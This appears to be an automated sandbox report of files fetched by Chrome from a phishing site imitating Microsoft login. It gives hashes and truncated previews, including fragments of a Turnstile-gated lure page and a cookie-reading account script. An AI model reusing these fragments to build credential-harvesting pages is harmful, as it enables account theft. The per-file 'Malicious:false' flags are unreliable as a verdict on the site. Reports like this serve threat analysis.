                                                                                                                              SHA-256:EB47C5509CEF44C582EF8ABB8C58766EA6118AD40B0FFC22A7652ED1DC6FEE8B
                                                                                                                              SHA-512:D3B1FC08CB7DDE27E9A16B749B0024A9F11D5067B0D023F8EB2E468533297DFC5BD7739C9B696F8D11D269350FA5F2D329FE6ABC4AB679888FDC97B2450DB336
                                                                                                                              Malicious:false
                                                                                                                              Preview:...........{W.H.8....F3...a,..E.Yc..i......,...Y.J2.1......R.LU....s.QX..................Oix..).NK7...KW...........`....G/..=......[..R......Y....KS.7.l.4..i)yd.Y...$..^.@....R......%o...J..gP.7..(.7.....0..V...j..#.Yi..,*.<z.c..s.0..I)b...x...&....R..8..G.ji......-......\.pL...a.^.]..a.X&......2.o...$,..s..l<^0)..1...Yu..w.$..0c.=c.}...xT"d....{..@.&.. .es0q.$bl.D..1*:z+y..t.F..X.....qn.../fUI...q....r.f.wk..Q.Y.I2.....<.GU'...|..1t.y...{....w..y.s.+.t5.A.J.............$...}...k.......tu........;Vf...]...|.Q......Z.].^...q..VMw........`.<..;;.....{}0.US..O..m..v<x..%3..Tu`...U...;.~{....c.?....?...v ..-E..2......{+..*T.....p....S...qR..+K1@k..mkQo...A........]p_.X2........B.....I..3..7..]d....@.bX....z.g...|..V-K[..^(..y...^N.^..oJF.kQ.P.R..F..om.B.pL.<F....R...(..i..,......I.F< ..T...`1.W3....L....+.S.M.c....110..........H....E,O..v..l..=...H$.J..J....4.C..dzPI..S.B@RJ.V>..GJ."/.eEwC..Q}d.k......KN|.i...=.....!.V....<%J.D......b
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):255
                                                                                                                              Entropy (8bit):5.710072326155945
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd/ZbZjZvKtWRVzjovK0vl2m8xDI4b6Fn010tian:TMHd9BZKtWR2fGJGtia
                                                                                                                              MD5:0E6A81E2AE37594DAFB9A9A6264736A5
                                                                                                                              SHA1:A34826D48DC9C41111526976410E255661B06DCF
                                                                                                                              SHA-256:5ED6F0629831F902BE7593DB5C65841D1E427581F83431991DE5A537272E67C0
                                                                                                                              SHA-512:4BD5A08DBFF1DC37328907C41977C2F741C7E0919741DB8C885D9B546B8CCD4B255D52EB3E5EEB1509A059601130A16A707509F37FBBF4C8165EB77050997D9D
                                                                                                                              Malicious:false
                                                                                                                              URL:https://crewbloom.s3.amazonaws.com/favicon.ico
                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>M4RGGHMMMNGH1FQ7</RequestId><HostId>J5FNCwYXYTAg7fPoukB+g+Tfvb9a72793pOw24cgCZ69wzj/Y5z6lbGwnDL5Rz2FwX/nHDyi7TPkKohyiW2t3Q==</HostId></Error>
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):621
                                                                                                                              Entropy (8bit):7.673946009263606
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                              MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                              Malicious:false
                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1435
                                                                                                                              Entropy (8bit):7.8613342322590265
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                              Malicious:false
                                                                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (3458), with CRLF line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):3460
                                                                                                                              Entropy (8bit):5.122700637311411
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLVvsushswsosry:a2IYz95qTdBaq
                                                                                                                              MD5:B749B680926D340E99D38C5508FEE003
                                                                                                                              SHA1:3D1DD5C483E7462E2DAC348E075300FCE28AFE72
                                                                                                                              SHA-256:D7324AA3826E7DA515FB12E338E2DB11ECEFBC6D52D6648F80B5914194570649
                                                                                                                              SHA-512:E4E0CD06303885215CFFAC6522CA7A5A87D7E87A0A125B2A36FAE59CD9565CD0DA146BE231B3BCE67B0660494FC6F200243125AC4C3D98C13FD5C38440A0B8C0
                                                                                                                              Malicious:false
                                                                                                                              URL:https://ywnjb.ftlivedocs.tech/Me.htm?v=3
                                                                                                                              Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 69 x 28, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):4.002585360278503
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPl2tJTl1xl/k4E08up:6v/lhP4l17Tp
                                                                                                                              MD5:12C3C69752ACCA8E57AD40AFE9995284
                                                                                                                              SHA1:4A455F3A28234D424762CCBC42082AC75365AE53
                                                                                                                              SHA-256:FB4998D9FEC91AECF09537CE12DB40C1B1DFCC516BA96456D957DB7448732256
                                                                                                                              SHA-512:D9F6576FD2472081572A998449BAC2E7814769E5FF8498F99328383433F2774AF5A547907DC05B75C130586A6A6EEB53933FAE5A98C59780DE1606C8790E142E
                                                                                                                              Malicious:false
                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cd56a630cf741e3/1728047464607/YBBtqSrR-kb7LqJ
                                                                                                                              Preview:.PNG........IHDR...E..........n.A....IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 449703
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):122193
                                                                                                                              Entropy (8bit):7.997505273485286
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:3072:H4ojbjOwCNA0H+Zenw+OA6m3SmjcnlDHG21TIoN:dHyi0Ity3wnY2lIA
                                                                                                                              MD5:AF2A7A4929E13F15A045C8C8D80A4543
                                                                                                                              SHA1:6A1EC81A5085D0846C77DD616AE686FF732C32D6
                                                                                                                              SHA-256:EB47C5509CEF44C582EF8ABB8C58766EA6118AD40B0FFC22A7652ED1DC6FEE8B
                                                                                                                              SHA-512:D3B1FC08CB7DDE27E9A16B749B0024A9F11D5067B0D023F8EB2E468533297DFC5BD7739C9B696F8D11D269350FA5F2D329FE6ABC4AB679888FDC97B2450DB336
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_ELtAAt2Ya8ISGuc0PJcBKA2.js
                                                                                                                              Preview:...........{W.H.8....F3...a,..E.Yc..i......,...Y.J2.1......R.LU....s.QX..................Oix..).NK7...KW...........`....G/..=......[..R......Y....KS.7.l.4..i)yd.Y...$..^.@....R......%o...J..gP.7..(.7.....0..V...j..#.Yi..,*.<z.c..s.0..I)b...x...&....R..8..G.ji......-......\.pL...a.^.]..a.X&......2.o...$,..s..l<^0)..1...Yu..w.$..0c.=c.}...xT"d....{..@.&.. .es0q.$bl.D..1*:z+y..t.F..X.....qn.../fUI...q....r.f.wk..Q.Y.I2.....<.GU'...|..1t.y...{....w..y.s.+.t5.A.J.............$...}...k.......tu........;Vf...]...|.Q......Z.].^...q..VMw........`.<..;;.....{}0.US..O..m..v<x..%3..Tu`...U...;.~{....c.?....?...v ..-E..2......{+..*T.....p....S...qR..+K1@k..mkQo...A........]p_.X2........B.....I..3..7..]d....@.bX....z.g...|..V-K[..^(..y...^N.^..oJF.kQ.P.R..F..om.B.pL.<F....R...(..i..,......I.F< ..T...`1.W3....L....+.S.M.c....110..........H....E,O..v..l..=...H$.J..J....4.C..dzPI..S.B@RJ.V>..GJ."/.eEwC..Q}d.k......KN|.i...=.....!.V....<%J.D......b
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (47261)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):47262
                                                                                                                              Entropy (8bit):5.3974731018213795
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                              MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                              SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                              SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                              SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                              Malicious:false
                                                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                              Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (32058)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):86659
                                                                                                                              Entropy (8bit):5.36781915816204
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:YNhEyjjTikEJO4edXXe9J578go6MWX2xkj8e4c4j2ll2AckaXEP6n15HZ+FhFcQ7:uxc2yjx4j2uX/kcQDU8Cu9
                                                                                                                              MD5:C9F5AEECA3AD37BF2AA006139B935F0A
                                                                                                                              SHA1:1055018C28AB41087EF9CCEFE411606893DABEA2
                                                                                                                              SHA-256:87083882CC6015984EB0411A99D3981817F5DC5C90BA24F0940420C5548D82DE
                                                                                                                              SHA-512:DCFF2B5C2B8625D3593A7531FF4DDCD633939CC9F7ACFEB79C18A9E6038FDAA99487960075502F159D44F902D965B0B5AED32B41BFA66A1DC07D85B5D5152B58
                                                                                                                              Malicious:false
                                                                                                                              Preview:/*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (47261)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):47262
                                                                                                                              Entropy (8bit):5.3974731018213795
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                              MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                              SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                              SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                              SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                              Malicious:false
                                                                                                                              Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (4585)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):7142
                                                                                                                              Entropy (8bit):5.521542323293806
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:/o3zpnc8TdekEd9Nz/YY3ZnzJhkGductm4nx/ICu:/o3hc8kkGr/Y2nlhkxOlnx/ju
                                                                                                                              MD5:5E57A1767641ED014BAC27003F8AEAF4
                                                                                                                              SHA1:941CF0ACC700EE04123A7A5566AF9C7AAE215B93
                                                                                                                              SHA-256:922CE8893BC95B1C6D3BD827B9BAAC6554A74FD9252743B7FAC8485AFC39DDCE
                                                                                                                              SHA-512:42AD60E48295E4EF8DE2C95583C7755C30794A778F1026FF5914031343182822C695D297D46ADD59F9871149B03DA6F68649F9055E4B42B63B1E17E46A4C63BD
                                                                                                                              Malicious:false
                                                                                                                              URL:https://l0gin-microso.ftlivedocs.tech/KUtIdFka
                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en-US">.<head>. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" async defer></script>.. <title>Just a moment...</title>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Compatible" content="IE=Edge" />. <meta name="robots" content="noindex,nofollow" />. <meta name="viewport" content="width=device-width,initial-scale=1" />. <script>. window.onloadTurnstileCallback = function () {. turnstile.render('#myWidget', {. sitekey: '0x4AAAAAAAwd9hw5rvoDjM7I',. callback: function(token) {. EnterSite();. },. });. };.. </script>.</head>..<body class="no-js">. <div class="main-wrapper" role="main">. <div id="loadingScreen"><div id="loadingLogo"><div id="container"><div id="containerShadow"></div><div id="log
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57443
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):16326
                                                                                                                              Entropy (8bit):7.987374325584103
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:GTwafLJjHlgnek9V15z6Brrwb9tYt3skOUAQC1:GTtTJjHlgneqTz658ht/eAQw
                                                                                                                              MD5:C217AE35B8592DC9F1E680487DAD094F
                                                                                                                              SHA1:2E642562C2BFD8968629317FF212684C7EB59193
                                                                                                                              SHA-256:D41992E79D7BCFCC1F32597208DD99033D99C04882EAFCC8508F2FA0EE728C6B
                                                                                                                              SHA-512:EAF3BF49BCF58A7F7C39CBF35FD75862FEE98F611536080DFC794D288274CB9D67E95D0299679F7981E110B2577A47579D3623C7F11A6AC2A0CFA56AAEA2CAB0
                                                                                                                              Malicious:false
                                                                                                                              Preview:...........}Ms#.......\.@..'F.........C)$....`.......Q.x7...}..'.}..?e#...QU]....Vo.................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.>............4....F,&c.)n.[.pcQp...4...6...i.............CkL=....'.\..L......2.A..o.u..."*p.. Xx.......'l.[w..'c/^.FP.....q.h4.R+X.x...d..M.}.Z,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j.7.....?.)..t.z.-..m.]..3y...3@.3YO.KSz]...4.b........V..+.%.[.&........l.H>G.^<..{.$"..-.i.........`qcw...`.[....as[.+.X...n..X..%,:......am."a....^o@@.`].....( (b...k..B.0.....AX.D.?...,..-<@k.;..(*..C.]...:.nn..8..s...."4.. ...J...P.n....F.3G..u..;9&.{.2.80.XB.....@.qw.:../.`.P?.+t..w6.a~..7...8k..U._......k,..o.....yQ..r.....}.E...B.r......?{...\fB....-.).Fb.;.p.N?(..P.?..p....F........)p..,`l...o@.;.x.....:..f.E....<0..#K\...K(?K/OX
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):35168
                                                                                                                              Entropy (8bit):7.99275807202193
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:768:FlTfWbX2KT+Hid0L7lumndasuVyeLtCR4sqvrdYnN6UcepZtf/r6:LgbT+Hid0TFbeLtUGvrdCNqepbHr6
                                                                                                                              MD5:D3B6AE9986DF244AB03412CC700335D0
                                                                                                                              SHA1:BAAA1F9899178938F3881F09B18265E47DA806E3
                                                                                                                              SHA-256:CA50059111D30C2E212C90805792EB543548AEF0D4941E886A778E3DCE0B9066
                                                                                                                              SHA-512:755C57FBC9BECE435A477F76C5E8198CA8942C23BE667ACAB83A00E5CD4F54075B10AA07C7FDC10C38FC3D5C0C406C9132FEB5B67BA5BCCC57EF796054A84E7C
                                                                                                                              Malicious:false
                                                                                                                              Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........:..z.>.y..u.....N...^..S.......z~@..;...n...K........x..A]....F.8X&Em..P.s.....a.g.|.d......._..C`.xQ...\..'...QP....?.R.{?....|.>........E4.GRz...z.k.z.}....h..>.{[E.:.....Pu. ..e6_.o.p*.w...>...:...o.k~...~..&E._..}}.}%[. ..#......z.5M.b.....z..k.H.4...l..D.o...z..M.+../..`....?y.J4.=....u.....Z.....E.d.....{0H^...8.....9..h......d..6j......../..z..V<.`.F.xm.y..yt.J....
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                              Malicious:false
                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113401
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):20414
                                                                                                                              Entropy (8bit):7.979508934961097
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:ekqQ8rNFEhCgMyL2iww6oIR8mWG+Pu9Z5IMU7ULgCsHqZo9v8:9CGEiL/w7R8DW9Z5BU7UMZHqok
                                                                                                                              MD5:48981D3CF57E7C58CA7E3E851EF9354E
                                                                                                                              SHA1:73593DE7633B10F9FFD0EF0E46280FA40FF433FF
                                                                                                                              SHA-256:8A5E756923CC5C3F013862427B7622F58A52501C5A6017FFF2FDB2AFD94A10C2
                                                                                                                              SHA-512:4E2B6EA222CE77E6EC12E059362DDDEA13758CDC77259FF5CF449BED5A1677E112CF49CD7ED7B1378F96FFD7C5E21BE66D2CA7EB2A9CD8026732F867FB5AE8B1
                                                                                                                              Malicious:false
                                                                                                                              URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_qzvqnltrxpy99ajspyxbgq2.css
